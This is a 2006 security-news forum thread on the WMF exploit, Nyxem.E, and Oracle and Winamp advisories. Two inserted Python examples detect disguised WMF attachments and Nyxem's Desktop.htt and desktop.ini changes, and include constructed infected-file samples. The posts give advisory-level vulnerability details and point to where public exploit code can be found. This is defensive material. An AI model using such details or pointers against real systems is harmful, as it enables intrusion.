1. Move to the latest virus definitions and stay up-to-date daily. McAfee users should move to DAT 4664 right away for improved protection for both forms of the WMF exploit.
2. Block all WMF attachments in email and filter other channels like IM or web surfing as applicable. Still, don’t rely on the WMF extension alone, as any extension type can be used with the second and more dangerous version of this exploit. An email version of the WMF exploit has been spammed out as a New Years Day greeting message with a JPEG attachment (that’s a WMF file in disguise due to metadata processing). Emails with an attachment of HappyNewYear.jpg should be blocked.
3. An all employees bulletin might be beneficial in promoting awareness to avoid opening any suspicious files or links they might find in their in-box. Everyone needs to be cautious when opening email and IM files or URL links. This can also help folks protect their home PCs as well.
4. There is an ISC “unofficial” hotfix patch that can temporarily offer protection until Microsoft has completed their work. Several security sites have affirmed this as trustworthy and it can be uninstalled from the Add/Remove programs section of the control panel once the anticipated patch from Microsoft is available. This new hotfix should be lab tested rigorously within the company including all current software, web applications, and the capability to uninstall the fix completely. The Internet Storm Center has more information on this hotfix patch.
5. All security and network administrators should have the WMF exploit high on their watchlist. This includes actively monitoring security sites like The Internet Storm Center, Secunia, F-Secure, AVERT, etc. for breaking news.
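Step 2 above, and item 4 of the earlier "Current recommendations" post, make the same point: a content filter must not trust the file extension, because a WMF renamed to .jpg is still processed as a WMF. The following is an added example, not code from the original posts or from any vendor named in them, of how a mail or content filter can sniff the first bytes of an attachment instead. It relies on the public WMF header layouts (placeable metafiles start with the key 0x9AC6CDD7; standard metafiles start with META_HEADER, type 1 or 2, header size 9 words, version 0x0100 or 0x0300). The sample attachments, including a "HappyNewYear.jpg" that is really a WMF, are constructed for the example.

```python
"""Content sniffing for Windows Metafile (WMF) attachments.

Added example for this thread; it is not code from the original posts or from
any vendor named in them. It applies the advice above (do not trust the
extension): look at the first bytes of an attachment and block anything that
is a WMF, whatever it is called. The header layouts used are the public WMF
ones: a placeable metafile starts with the key 0x9AC6CDD7, and a standard
metafile starts with META_HEADER (type 1 or 2, header size 9 words, version
0x0100 or 0x0300). All sample attachments below are constructed for the example.
"""
import struct

PLACEABLE_KEY = 0x9AC6CDD7   # little-endian bytes D7 CD C6 9A at offset 0
STANDARD_HEADER_LEN = 18     # Type(2) HeaderSize(2) Version(2) Size(4) NumObjects(2) MaxRecord(4) NumMembers(2)


def has_standard_header(data: bytes) -> bool:
    """True if data begins with a plausible META_HEADER record."""
    if len(data) < STANDARD_HEADER_LEN:
        return False
    mtype, header_size, version = struct.unpack_from("<HHH", data, 0)
    return mtype in (1, 2) and header_size == 9 and version in (0x0100, 0x0300)


def is_wmf(data: bytes) -> bool:
    """Identify a WMF by its bytes, ignoring the file name entirely."""
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        return True                      # the placeable key alone is distinctive enough to block
    return has_standard_header(data)


def classify_attachment(name: str, data: bytes) -> str:
    """Return a verdict string for one attachment.

    Content is checked first (a WMF renamed to .jpg is still a WMF); the .wmf
    extension rule is kept as a second net for files too short to sniff.
    """
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if is_wmf(data):
        if ext != "wmf":
            return f"block: WMF content disguised as .{ext}"
        return "block: WMF content"
    if ext == "wmf":
        return "block: .wmf extension"
    return "allow"


# --- constructed samples (header bytes only, no exploit content) --------------
_STANDARD_HEADER = struct.pack("<HHHIHIH", 1, 9, 0x0300, 9, 0, 0, 0)
_PLACEABLE_HEADER = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100, 96, 0, 0)

SAMPLES = {
    "HappyNewYear.jpg": _PLACEABLE_HEADER + _STANDARD_HEADER,  # the disguise described in the thread
    "chart.wmf": _STANDARD_HEADER,
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 20,             # JPEG SOI marker, a genuine image
    "notes.txt": b"Happy New Year 2006\n",
}


def scan_samples(samples=None) -> dict:
    """Classify every sample and return {name: verdict}."""
    samples = SAMPLES if samples is None else samples
    return {name: classify_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:20s} {verdict}")
```

The order of the checks is the point: the content test runs before the extension test, so the disguised "HappyNewYear.jpg" is blocked while a real JPEG with the same extension passes. The extension rule only adds coverage for files too short to carry a recognisable header.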
-
January 2, 2006 at 11:33 am #3081026
Several new WMF-Exploit variants reported by Trend
by harry waldron, cpcu, ccp · about 18 years, 3 months ago
In reply to Harry Waldron
Active development of new attacks continues based on several new variants using the WMF-Exploit, as reported by Trend.
Several new WMF-Exploit variants reported by Trend
http://www.trendmicro.com/vinfo/
MALWARE-NAME LEVEL-RISK DATE-POSTED PROTECTION
TROJ_NASCENE.M Low Jan 2, 2006 Available soon
TROJ_NASCENE.J Low Jan 1, 2006 3.139.00
TROJ_NASCENE.K Low Jan 1, 2006 3.139.00
TROJ_NASCENE.L Low Jan 1, 2006 3.139.00
TROJ_NASCENE.I Low Jan 1, 2006 3.139.00
TROJ_NASCENE.H Low Dec 31, 2005 2.138.11 (CPR)
-
January 5, 2006 at 9:34 am #3094849
Microsoft updates key security guides for corporate users
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Microsoft has recently updated key security guides targeted for enterprise users:
The Threats and Countermeasures Guide v2.0
The Windows Server 2003 Security Guide v2.0
-
January 5, 2006 at 1:41 pm #3094710
MS06-001: Microsoft releases WMF patch early
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
All users should perform a Windows Update as soon as they can. Microsoft decided to release MS06-001 earlier than planned. It just became available under Windows Update … It requires a reboot and is working well for me so far.
MS06-001: Microsoft releases WMF patch early
MS06-001: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
-
January 9, 2006 at 3:56 am #3096621
Sony BMG Rootkit – Preliminary Settlement Terms announced
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
The Sunbelt blogs provide excellent updates on security news. Recently, this summary of the preliminary settlement terms was announced for damages caused by the First 4 Internet and SunnComm protective software. System damage and other issues were created by customers playing CDs in their PCs and these agents being secretly and automatically loaded from music CDs.
-
January 9, 2006 at 3:56 am #3096622
Lotus Notes – Vulnerable to WMF exploit fixed by MS06-001
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
The MS06-001 security update provided by Microsoft last week has hopefully been installed by most companies and users. There are over 100 WMF exploits developed so far in-the-wild and non-Microsoft products may be affected as noted in this link.
-
January 9, 2006 at 10:52 am #3080431
WMF Exploit – How well do AV products detect this new threat?
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Thankfully, Microsoft provided MS06-001 protection as an early emergency release to protect against a very active environment of exploitation. Prior to this release, Anti-Virus protection was one of the key defense approaches to help block these malicious attacks. While most likely all AV vendors have improved their capability to handle WMF exploits, the following provides some key testing conducted by AV-Test during some of the critical days prior to Microsoft’s security release.
-
January 9, 2006 at 2:53 pm #3078274
WMF exploits – Two new areas of vulnerability?
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
There may be two new possible areas of attack for malformed WMF files, which may not be covered by MS06-001? So far, no exploits in the wild have been reported and this new potential exposure should be carefully watched.
Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities
http://www.incidents.org/diary.php?storyid=1031
http://www.securityfocus.com/bid/16167/info
QUOTE: Microsoft Windows WMF graphics rendering engine is affected by multiple memory corruption vulnerabilities. These issues affect the ‘ExtCreateRegion’ and ‘ExtEscape’ functions. These problems present themselves when a user views a malicious WMF formatted file containing specially crafted data. Reports indicate that these issues lead to a denial of service condition, however, it is conjectured that arbitrary code execution is possible as well. Any code execution that occurs will be with the privileges of the user viewing a malicious image. An attacker may gain SYSTEM privileges if an administrator views the malicious file.
-
January 10, 2006 at 4:14 pm #3078791
Microsoft Security Bulletins – January 2006
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
While hopefully everyone has installed MS06-001, Microsoft has just released two more critical security patches, as part of their normal “Patch Tuesday” updates. I’ve updated both of my work PCs and in early testing, no issues so far
Microsoft Security Bulletins – January 2006
http://www.microsoft.com/technet/security/bulletin/ms06-jan.mspx
Microsoft Security Bulletin MS06-001
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Overview: This vulnerability is currently being exploited and was previously discussed by Microsoft in Microsoft Security Advisory 912840. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Microsoft Security Bulletin MS06-002
Vulnerability in Embedded Web Fonts Could Allow Remote Code Execution (908519)
http://www.microsoft.com/technet/security/bulletin/ms06-002.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution
Overview: An attacker who successfully exploited this vulnerability could take control of an affected system. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Microsoft Security Bulletin MS06-003
Vulnerability in TNEF Decoding in Microsoft Outlook and Microsoft Exchange Could Allow Remote Code Execution (902412)
http://www.microsoft.com/technet/security/bulletin/ms06-003.mspx
Impact of Vulnerability: Remote Code Execution
Maximum Severity Rating: Critical
Overview: This update resolves a newly-discovered, privately-reported vulnerability that could allow an attacker to run arbitrary code on the system. The vulnerability is documented in the “Vulnerability Details” section of this bulletin. On vulnerable versions of Outlook, Office Language Interface Packs, Office MultiLanguage Packs or Office Multilingual User Interface Packs, if a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of the client workstation.
-
January 11, 2006 at 5:32 am #3079642
Linux users may be impacted by WMF in Windows emulation mode
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
In sharing with some users in one of the forums, the question was asked regarding whether Wine or CrossOver Office are impacted (i.e., as they provide an emulation environment to run Windows applications in Linux). In researching this there may indeed be impacts and it’s important to apply any associated updates:
Wine Potential WMF “SETABORTPROC” Vulnerability
http://secunia.com/advisories/18323/
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=346197
-
January 11, 2006 at 5:32 am #3079643
Apple Quick Time media player – Critical Update for Mac and Windows
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
All Windows and Mac users who have Quick Time installed should update to the latest versions of this software:
Apple Quick Time Advisory Information
http://www.incidents.org/diary.php?storyid=1033
http://secunia.com/advisories/18370/
http://www.frsirt.com/english/advisories/2006/0128
Apple Quick Time Advisory Downloads
Mac OS X (version 10.3.9 or later):
http://www.apple.com/support/downloads/quicktime704.html
Windows 2000/XP:
http://www.apple.com/quicktime/download/win.html
DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a user’s system.
-
January 11, 2006 at 5:32 pm #3078546
Feebs – New email/downloader virus
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
This one may be spreading and uses 5 malicious websites that were reported to be still working.
Feebs – New email/downloader virus
http://www.incidents.org/diary.php?storyid=1035
http://secunia.com/virus_information/26130/feebdl-a/
http://www.sophos.com/virusinfo/analyses/trojfeebdla.html
DESCRIPTION: Please avoid all attachments labeled as message.zip. This new zipped HTA-based virus is undetectable by many AV vendors currently.
-
January 12, 2006 at 1:32 pm #3080110
Sarbanes-Oxley Act – Key Information
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
The following links pertain to the Sarbanes-Oxley Act of 2002 based on research. I updated an older posting with more current links, as I’ll need this for a key project at work next week. These links provide information on SOX regulations and its impact on IT and security reporting concerns.
The Sarbanes-Oxley Act was signed into law on 30th July 2002, and introduced highly significant legislative changes to financial practice and corporate governance regulation. It introduced stringent new rules with the stated objective: “to protect investors by improving the accuracy and reliability of corporate disclosures made pursuant to the securities laws“.
Sarbanes-Oxley Act – General Information
Sarbanes-Oxley – Key Links
http://www.sarbanes-oxley.com/
http://www.pcaob.com/standards.php
http://www.soxtoolkit.com/
http://www.entrust.com/governance/sox.htm
http://www.auditnet.org/sarbox.htm
http://www.sarbanes-oxley-101.com/
Sarbanes-Oxley – Free Forums
http://www.sarbanes-oxley-forum.com/
Sarbanes-Oxley – Full Text of Law
http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=107_cong_bills&docid=f:h3763enr.txt.pdf
Sarbanes-Oxley – AICPA links & Summary
http://www.aicpa.org/sarbanes/index.asp
http://www.aicpa.org/info/sarbanes_oxley_summary.htm
http://www.sarbanes-oxley-101.com/sarbanes-oxley-TOC.htm
Sarbanes-Oxley – Key Compliance Sections
http://www.sarbanes-oxley-101.com/sarbanes-oxley-compliance.htm
http://www.sarbanes-oxley-101.com/sarbanes-oxley-faq.htm
http://www.sarbanes-oxley-101.com/SOX-302.htm
http://www.sarbanes-oxley-101.com/SOX-404.htm
http://www.sarbanes-oxley-101.com/SOX-409.htm
http://www.sarbanes-oxley-101.com/SOX-902.htm
Information Technology – Critical Success Factors
Using IT successfully to comply with Section 404 means integrating IT into your Sarbanes-Oxley program by:
1. Making IT an active participant in the company’s program management office for Sarbanes-Oxley compliance;
2. Organizing IT resources and establishing an IT internal control program;
3. Providing IT representation on the steering committee;
4. Identifying, documenting and evaluating IT-related COSO requirements, IT processes and application controls;
5. Application Controls: data validation, e-checks and output reconciliations, segregation of duties, protection of sensitive data;
6. General Application Controls: application development, testing, change control, database management, and application level security;
7. General Computer Controls: hardware/software configuration and management, performance and capacity management, security, data center operations, database administration;
8. Employing Best Practices: tools, approaches and internal control specialists as required.
SOX Information Technology – Key Links
http://www.cioinsight.com/article2/0,3959,1217378,00.asp
http://www2.cio.com/analyst/report2271.html
http://www.eweek.com/article2/0,4149,1527933,00.asp
http://www.nwfusion.com/news/2004/0730pwc.html
-
January 15, 2006 at 5:32 am #3077418
Use of Rootkits in Symantec AV products is exaggerated
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Recently, a number of media articles have surfaced that claim Symantec is using “Rootkit” techniques by hiding key control folders from the Operating System. This approach might create install/uninstall issues when non-conventional approaches are used. In a worst case, it could be manipulated by virus writers to hide malicious malware.
Symantec is trying to lock down and protect the SAV infrastructure, so that there might be less risk associated with users accidentally discovering and manipulating the installed AV environment.
While Symantec uses only one element of a “rootkit”-like technique (hiding a control file from the Operating System), the key reason this is NOT a rootkit is that Symantec is not directly doing anything malicious with this approach.
Symantec is taking steps to further protect this control system, so that the dark side of the force does not use it as a place to hide malware. The original findings were good and hopefully the media will more realistically report technical findings in the future.
eWeek: Symantec Caught in Norton ‘Rootkit’ Flap
http://www.eweek.com/article2/0,1895,1910077,00.asp
QUOTE: Symantec Corp. has admitted to using a rootkit-type feature in Norton SystemWorks that could provide the perfect hiding place for attackers to place malicious files on computers. The anti-virus vendor acknowledged that it was hiding a directory from Windows APIs as a feature to stop customers from accidentally deleting files but, prompted by warnings from security experts, the company shipped a SystemWorks update to eliminate the risk.
Kaspersky: No rootkit in Kaspersky Anti-Virus
http://www.viruslist.com/en/weblog?calendar=2006-01
QUOTE: We believe that this technology is not a rootkit and we do not believe hackers and/or malware can exploit it because:
1. If a KAV product is active, the streams are hidden and no processes (including system) have access to them.
2. If the product is disabled, the streams will be visible if viewed using the appropriate tools (standard for working with NTFS streams)
3. If a stream is re-written with some (possibly malicious) data or code (for example after rebooting in Safe Mode), when the system is next re-started, KAV will read the stream and not recognize the format. KAV will then begin to rebuild the checksum database – thus it will destroy the alien code/data.
To sum up: I think that the ”rootkit” problem is being over hyped. It is up to all of us in the security industry and press to be careful about how we use terms. Ordinary users, who can’t analyze the situation themselves, shouldn’t be misinformed.
Other Links
-
January 18, 2006 at 5:01 pm #3098221
WMF Exploits – Third New Version emerges this week
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
As noted in the following advisory, a third “new and improved” version of the WMF exploit was published on January 15, 2006. Thankfully, Microsoft has provided MS06-001 protection in the emergency release during early January.
The new link for Exploit “C” can be found in the general FrSIRT advisory. The exploit link could be potentially harmful, if you import this code into your browser environment, so please be careful.
-
January 22, 2006 at 5:02 am #3259725
Firewall Protection: Ports with Known Vulnerabilities and Exploits
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
CERT provides a maintained list of TCP/IP ports that have Known Vulnerabilities and Exploits associated with them. A Firewall system will block these malicious attacks and make an individual’s presence more stealth-like on the Internet.
All home users should employ this safeguard, and even some of the free versions provide excellent protection. For example, I’ve been using the free version of Zone Alarm for several years. Also, XP SP2’s Firewall provides basic incoming protection and integrates very well with Windows.
-
January 22, 2006 at 5:02 am #3259724
The official MSN Messenger 8 beta release and Virkel.F
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
This entry below in December caused some recent confusion, with the official MSNM 8 beta, which has been released by Microsoft:
Virkel.F: Spoofed as an MSN Messenger beta 8 download
During December, virus writers used a social engineering trick to get users to load a virus onto their PCs. The Virkel.F offered a new “leaked” MSNM version 8 which did not exist at the time. Users who clicked on the URL link in the message would download a virus rather than the MSNM 8 beta. Most likely this hostile website has been shut down and copies of the Virkel.F worm do not exist in the wild.
Microsoft has now released MSNM beta 8. It is now safe to download and test MSNM 8, as long as you obtain this directly from Microsoft. As with any software update, users should confirm that their invitations are directly from Microsoft. Please be careful and ensure you are downloading from Microsoft’s site, rather than the spoofed URL used by this virus. “Think before you click.” Always be careful with URLs in email messages, as they can be just as dangerous as email attachments.
-
January 24, 2006 at 7:38 am #3259326
Nyxem.E – email/network virus with destructive payload on 3rd day of month
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
There are now over 600,000 users who have been infected with this new virus. It contains a DESTRUCTIVE payload that will be executed on the 3rd day of the month.
Some of the email messages and attachments use inappropriate language, and this new destructive threat can be avoided. As a best practice, email and websites of this nature should always be avoided. Still, it is a “network walker” and can spread to PCs that openly share folders or hard drives, so that one copy of this in an organization could be dangerous.
Nyxem.E – Information Storm Center – Latest Information
Nyxem.E – Information Storm Center – Contains several AV Vendor links
Nyxem.E – Fortinet provides an EXCELLENT analysis
File Deletion Dangers — On the 3rd of the month it will attempt to delete a lot of documents off the user’s disks, including Office documents (*.doc, *.xls, *.ppt, *.pps), PDF files, .zip and .rar archives among others.
HTT File Modification — The virus will modify the Desktop.htt configuration file which controls how Active Desktop is displayed to user systems. The change is to launch a copy of the virus as C:\WinZip_Tmp.exe whenever Windows loads the Active Desktop (Windows start up). The virus appends JavaScript code to Desktop.htt
Active X Dangers — The code uses an ActiveX control to reference the file “WinZip_Tmp.exe”. Additionally, the virus will modify the “desktop.ini” configuration file to point to an infectious “Temp.htt” HTML file to launch the virus. The virus is coded to register the dropped ActiveX control through changes to the system registry. By creating the following registry entries, the control is considered “safe” and digitally signed. The threat of worms like this will make them much more dangerous in the future. If a worm puts a fake CA certificate on an infected machine, MITM attacks become extremely easy.
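A defender's check for the Desktop.htt and desktop.ini modifications described in the Fortinet summary above, as an added example that is not code from the original post or from Fortinet. The file contents are constructed stand-ins: the clean Desktop.htt is a minimal HTML page and the "infected" variant has an object tag and a script block appended after it; the desktop.ini layout with a PersistMoniker line and the all-zero GUID are assumptions, and the scan keys on the file names the post gives (WinZip_Tmp.exe, Temp.htt) rather than on any exact byte pattern of the virus.

```python
"""Check Active Desktop configuration files for the Nyxem.E modifications
the post describes: JavaScript appended to Desktop.htt that references
C:\\WinZip_Tmp.exe, an ActiveX control, and desktop.ini redirected to Temp.htt.

Added example, not code from the original forum post or from Fortinet.
All sample file contents below are constructed; the desktop.ini section
layout and the zero GUID are placeholders, not values from the page.
"""
import re

LAUNCHER_NAME = "winzip_tmp.exe"   # dropped copy the post says Desktop.htt launches
REDIRECT_TARGET = "temp.htt"       # HTML file the post says desktop.ini is pointed at


def scan_desktop_htt(text: str) -> list:
    """Return indicator strings found in the body of a Desktop.htt file."""
    findings = []
    lower = text.lower()
    if LAUNCHER_NAME in lower:
        findings.append("Desktop.htt references " + LAUNCHER_NAME)
    # A normal Desktop.htt ends with </html>; the post describes the virus
    # appending JavaScript, so script after the closing tag is a strong sign.
    end = lower.rfind("</html>")
    if end != -1 and "<script" in lower[end:]:
        findings.append("script block appended after </html> in Desktop.htt")
    if "activexobject" in lower or re.search(r"<object[^>]*classid", lower):
        findings.append("Desktop.htt loads an ActiveX control")
    return findings


def scan_desktop_ini(text: str) -> list:
    """Return indicator strings for a desktop.ini that points at Temp.htt."""
    findings = []
    for line in text.splitlines():
        if REDIRECT_TARGET in line.lower():
            findings.append("desktop.ini points at " + line.strip())
    return findings


def scan_active_desktop(desktop_htt: str, desktop_ini: str) -> list:
    """Combine both checks; an empty list means no indicator was found."""
    return scan_desktop_htt(desktop_htt) + scan_desktop_ini(desktop_ini)


# Constructed samples (not the virus's real files).
CLEAN_HTT = '<html><body bgcolor="#808080">Active Desktop</body></html>\n'
INFECTED_HTT = CLEAN_HTT + (
    '<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>\n'
    '<script language="JavaScript">var launcher = "C:\\\\WinZip_Tmp.exe";</script>\n'
)
CLEAN_INI = "[.ShellClassInfo]\nConfirmFileOp=0\n"
INFECTED_INI = (
    "[ExtShellFolderViews]\n"
    "[{00000000-0000-0000-0000-000000000000}]\n"   # placeholder GUID
    "PersistMoniker=file://Temp.htt\n"
)

if __name__ == "__main__":
    print("clean:", scan_active_desktop(CLEAN_HTT, CLEAN_INI))
    print("infected:", scan_active_desktop(INFECTED_HTT, INFECTED_INI))
```

On a real machine the two files would be read from the user's profile directories; the checks are case-insensitive because the names can appear in either case in HTML or INI text.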
-
January 24, 2006 at 3:38 pm #3257948
Computer Virus – 20th Anniversary this month
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
During January 1986, the first computer virus was found in the wild, which could automatically spread from PC to PC. Today, we encounter 20-30 new variants per day with innovation in their social engineering approach and their overall sophistication. Users always need to employ the best technical defenses, stay up-to-date on all security patches, and “think before they click” any URL or email attachment.
PC viruses hit 20 year milestone
http://news.bbc.co.uk/2/hi/technology/4630910.stm
It was during the opening weeks of 1986 that the first PC virus, called Brain, was discovered in the wild. Though it achieved fame because it was the first of its type, the virus was not widespread as it could only travel by hitching a ride on floppy disks swapped between users. Brain was known as a “boot-sector” virus because of the area on a floppy disk it hid on. By concealing itself in this region, the virus could ensure that it would be installed every time that floppy disk was used on another computer.
-
January 25, 2006 at 7:43 pm #3107328
Bagle – New Round of Variant(s)
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Recently, Bagle celebrated its 2nd anniversary and over 400 different variants have emerged. Another round of new variants appear to be seeded in the wild, and we’ll most likely see the email and downloader versions.
-
January 25, 2006 at 7:43 pm #3107327
Kaspersky is now reporting over 1,000,000 PCs are infected
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Kaspersky is now reporting over 1,000,000 PCs are infected
quote: We’ve just issued an alert for Nyxem.e, due to the number of reports we’ve been receiving for the past few days but also because of its destructive payload which activates on 3rd of every month. According to our data, the outbreak seems to be more or less localized. We are still receiving reports from countries such as the US and Germany, but the number of reports from (eg.) Russia is becoming very small. With the public Nyxem.e counter having well passed 1,000,000 hits at the moment, there is no doubt that some people will have unpleasant surprises on 3rd of February. If you do not have an antivirus installed, you can use the Kaspersky free online scanner to check for a Nyxem.e infection before it’s too late.
-
January 26, 2006 at 4:06 pm #3094063
Oracle PL/SQL Gateway – Critical unpatched vulnerability
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
A critical vulnerability has been discovered that is currently unpatched. Oracle will most likely address this quickly and so far there are no reports of this being exploited in the wild.
Oracle Products PL/SQL Gateway Security Bypass Vulnerability
http://secunia.com/advisories/18621/
Critical: Highly critical
Impact: Security Bypass
Solution Status: Unpatched
Software:
Oracle Application Server 10g
Oracle Database 8.x
Oracle HTTP Server 8.x
Oracle HTTP Server 9.x
Oracle9i Application Server
Oracle9i Database Enterprise Edition
Oracle9i Database Standard Edition
DESCRIPTION: A vulnerability has been identified in various Oracle products, which could be exploited by remote attackers to bypass security restrictions and gain unauthorized access to a vulnerable system. This flaw is due to an input validation error in the PL/SQL Gateway component that does not properly handle malformed HTTP requests, which could be exploited by remote unauthenticated attackers to bypass the “PLSQLExclusion” list and gain access to “excluded” packages and procedures that will allow the compromise of the back-end database server.
Oracle PL/SQL Gateway Exclusion List Security Bypass Vulnerability
http://www.frsirt.com/english/advisories/2006/0338
Advisory ID : FrSIRT/ADV-2006-0338
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-01-25
Solution: The FrSIRT is not aware of any official supplied patch for this issue.
Workaround: Administrators can filter malicious characters and character sequences in a proxy or firewall with URL filtering capabilities.
-
January 29, 2006 at 11:43 am #3109388
Oracle DB Server 9/10 – Proof-of-concept Exploit published
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
A new proof-of-concept exploit has been published which could be turned into a more harmful attack by malicious individuals.
Advisory ID : FrSIRT/ADV-2006-0243
CVE ID : CVE-2006-0272
Rated as : High Risk
The exploit code can be viewed at FrSIRT’s site as noted below. Please only view the source code if interested and do not test with it:
http://www.frsirt.com/english/
2006-01-26 : Oracle Database Server 9i/10g XML Database Component Buffer Overflow Exploit
-
January 29, 2006 at 11:43 am #3109387
What is the difference between a trojan horse, virus, or worm?
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
-
January 30, 2006 at 3:43 am #3108449
Winamp 5.12 – ZERO Day Exploit for unpatched vulnerability
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Please be careful if you use WinAmp as a media player on your system. A new exploit has surfaced for an unpatched vulnerability that is rated as a critical risk by security firms. The vendor will most likely patch this soon and the patch should be applied expediently.
Winamp Computer Name Handling Buffer Overflow Vulnerability
http://secunia.com/advisories/18649/
DESCRIPTION: The vulnerability is caused due to a boundary error during the handling of filenames including a computer name. This can be exploited to cause a buffer overflow via a specially crafted playlist containing a filename starting with an overly long computer name (about 1040 bytes). Successful exploitation allows execution of arbitrary code on a user’s system when e.g. a malicious website is visited. The vulnerability has been confirmed in version 5.12. Other versions may also be affected.
Nullsoft Winamp Player PLS Handling Remote Buffer Overflow Vulnerability
http://www.frsirt.com/english/advisories/2006/0361
Advisory ID : FrSIRT/ADV-2006-0361
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-01-29
Technical Description: A vulnerability has been identified in Winamp, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a buffer overflow error when processing a specially crafted playlist (“.pls” file) containing a malformed “File1” tag, which could be exploited by remote attackers to execute arbitrary commands and take complete control of an affected system without any user-interaction via a specially crafted web page.
Exploits: An exploit is publicly available. It can be found at the FrSIRT site for anyone who wants to review the source code.
Affected Products: Nullsoft Winamp version 5.12 and prior
Solution: The FrSIRT is not aware of any official supplied patch for this issue.
Recommendation: Use Winamp for offline media only or access only highly trusted sites until a patch is issued. It is likely that Nullsoft will quickly supply a patch, but until then use Winamp cautiously.
-
January 30, 2006 at 7:43 pm #3108902
WinAmp 5.13 released to address ZERO DAY exploit
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
-
January 31, 2006 at 3:43 pm #3134615
Blackworm – First reports of damage with incorrect PC clock settings
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
http://www.f-secure.com/weblog/archives/archive-012006.html#00000797
QUOTE: When Nyxem activates, it will overwrite all of your DOC/XLS/PPT/ZIP/RAR/PDF/MDB files. This is nasty, as this is done on all mounted drives, ie. any drive that has a drive letter. So it might affect your USB thumb drives, external hard drives and network drives! Also, if you’re taking daily automatic backups you might end up backing up the corrupted files over good files. The number of machines that have been hit by this worm is over 300,000. Many of those have been disinfected already, though. But thousands of computers will get their files overwritten on February 3rd – most of them in India, Turkey and Peru.
-
January 31, 2006 at 3:43 pm #3134616
Internet Explorer 7 beta released to public
by harry waldron, cpcu, ccp · about 18 years, 2 months ago
In reply to Harry Waldron
Microsoft has released a preview of the IE 7 beta for public testing
http://news.zdnet.com/2100-3513_22-6033116.html
QUOTE: Microsoft took the wraps off Internet Explorer 7 Tuesday, releasing the new “preview” version of its Web browser to the general public for testing.
The program, still a work in progress, is available for download from the Internet Explorer section of Microsoft’s corporate Web site, the company said. The company, which began limited testing in July, had promised to deliver a public beta by the end of March.
“The big update is that it’s public,” said Margaret Cobb, group product manager for Internet Explorer at Microsoft. “All previous releases were limited.”
The latest version works only with Windows XP Service Pack 2 and includes many of the features Microsoft has been touting for months. Among them are new security and privacy protection capabilities such as mechanisms designed to combat phishing attacks, spyware and other threats.
-
February 2, 2006 at 5:51 pm #3107939
Unpatched Windows SSDP/UPnP local vulnerability & POC Exploit
by harry waldron, cpcu, ccp · about 18 years, 1 month ago
In reply to Harry Waldron
Thankfully, this new vulnerability is not remotely exploitable
Microsoft Windows SSDP and UPnP Services Privilege Escalation Issue
http://www.frsirt.com/english/advisories/2006/0417
Advisory ID : FrSIRT/ADV-2006-0417
CVE ID : GENERIC-MAP-NOMATCH
Rated as : Moderate Risk
Remotely Exploitable : No
Locally Exploitable : Yes
Release Date : 2006-02-02
EXPLOIT: POC exploit code can be found at FrSIRT
